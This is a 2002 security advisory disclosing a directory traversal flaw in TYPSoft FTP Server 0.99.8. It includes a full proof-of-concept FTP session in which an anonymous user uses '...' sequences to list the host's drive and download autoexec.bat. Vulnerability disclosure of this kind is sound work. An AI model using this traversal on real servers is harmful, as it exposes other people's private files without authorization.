Type

Directory Traversal

Release Date

October 25, 2002

Product / Vendor

TYPsoft FTP Server is a great server for beginers or advanced users. It features an clean, easy to understand interface, fast transfers Anonymous user, Log and connection and more.

http://www.typsoft.com

Summary

Authenticated users can gain read access to the directories of the host where the FTP server has been installed. Through the use of '...' sequences when submitting a 'ls' command, arbitrary directories and files could be disclosed, potentially compromising the privacy of user data and/or obtaining information which could be used to further compromise the host's security.

If successfully exploited this vulnerability could lead to the disclosure of sensitive information assisting in further attacks against the host.

An analysis for this vulnerability exists and is available below.

==================== SNIP ====================

ts@metacortex:~$ ftp 192.168.10.2
Connected to 192.168.10.2.
220 TYPSoft FTP Server 0.99.8 ready...
Name (192.168.10.2:ts): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/" is current directory.
ftp> ls
500 'EPSV': command not understood.
227 Entering Passive Mode (192,168,10,2,9,164).
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Oct 25 11:06 .
drw-rw-rw- 1 ftp ftp 0 Oct 25 11:06 ..
226 Transfer complete.
ftp> cd ...
250 CWD command successful. "/.../" is current directory.
ftp> ls
227 Entering Passive Mode (192,168,10,2,9,165).
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 28235 Oct 21 16:17 SETUPXLG.TXT
-rw-rw-rw- 1 ftp ftp 1830 Oct 22 01:30 SCANDISK.LOG
drw-rw-rw- 1 ftp ftp 0 Oct 20 16:36 WINNT
drw-rw-rw- 1 ftp ftp 0 Oct 20 16:40 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Oct 20 16:41 Program Files
-rwxrwxrwx 1 ftp ftp 50 Aug 25 15:24 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 600 Oct 24 22:39 PUTTY.RND
drw-rw-rw- 1 ftp ftp 0 Oct 25 11:05 TYPSoft FTP Server
drw-rw-rw- 1 ftp ftp 0 Oct 25 11:06 temp
226 Transfer complete.
ftp> get c:\autoexec.bat
local: c:autoexec.bat remote: c:autoexec.bat
227 Entering Passive Mode (192,168,10,2,9,166).
150 Opening data connection for c:autoexec.bat.
226 Transfer complete.
50 bytes received in 0.19 seconds (0.26 KB/s)
ftp> bye
221 Goodbye!

==================== SNIP ===================

Tested

TYPSoft Ftp Server v0.99.8 / Windows 2000 sp3
TYPSoft Ftp Server v0.99.8 / Windows 98 SE

Vulnerable

TYPSoft Ftp Server v0.99.8

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net